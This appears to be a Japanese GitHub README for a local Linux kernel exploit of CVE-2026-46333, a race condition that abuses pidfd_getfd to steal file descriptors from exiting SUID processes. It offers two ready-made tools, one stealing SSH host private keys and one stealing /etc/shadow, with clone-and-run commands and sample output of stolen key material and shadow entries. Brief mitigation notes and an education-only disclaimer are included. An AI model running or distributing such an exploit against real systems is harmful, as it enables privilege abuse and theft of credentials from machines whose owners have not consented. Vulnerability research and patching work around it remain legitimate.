
CVE-2026-46333
Linuxカーネルの競合状態脆弱性に対する高品質なProof of Concept
CVE-2026-46333 のクリーンで信頼性の高いProof-of-Conceptエクスプロイト — Linuxカーネルのプロセス終了パスにおける競合状態を利用したローカル情報漏洩
Kali Linux上でSSHホスト秘密鍵と/etc/shadowの奪取に成功
CVE-2026-46333(別名 ssh-keysign-pwn)は、Linuxカーネルのptraceとプロセス終了ロジック(do_exit() → exit_mm() が exit_files() より前)における競合状態です。
特権プロセス(例:SUID ssh-keysign や chage)が終了時にmm == NULLになると、ダンプ可能性チェックがバイパスされ、権限のないローカル攻撃者がpidfd_getfd()を使用してオープンファイル記述子を盗むことが可能になります。
影響:
/etc/ssh/ssh_host_*_key)の窃取/etc/shadowのダンプ発見者: Qualys
修正: カーネルコミット 31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a(2026年5月)
chage経由の/etc/shadow窃取ツールgit clone https://github.com/0xBlackash/CVE-2026-46333.git
cd CVE-2026-46333
sudo ./CVE-2026-46333
sudo ./CVE-2026-46333-shadow
| ファイル | 説明 |
|---|---|
cve-2026-46333.c | SSHホスト秘密鍵窃取ツール |
cve-2026-46333-shadow.c | chage経由の/etc/shadow窃取ツール |
README.md | 本ファイル |
SSH鍵窃取:
[+] SUCCESS! Stolen fd 3 -> /etc/ssh/ssh_host_ecdsa_key (round 0)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB...
Shadow窃取:
[+] SUCCESS! Stolen /etc/shadow (round 0)
root:*:19953:0:99999:7:::
kali:$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$...
31e62c2ebbfd... を含む任意のバージョンに更新してくださいsshd_configでEnableSSHKeysignを無効にしてくださいこのエクスプロイトは教育およびセキュリティ研究目的のみです。
所有しているシステム、または明示的な書面による許可を得たシステムでのみ使用してください。
作者は誤用や損害について一切の責任を負いません。
このプロジェクトはMITライセンスの下で提供されています — 自由に使用、変更、配布してください。
セキュリティコミュニティに❤️を込めて
システムを最新に保つことが最善の防御です。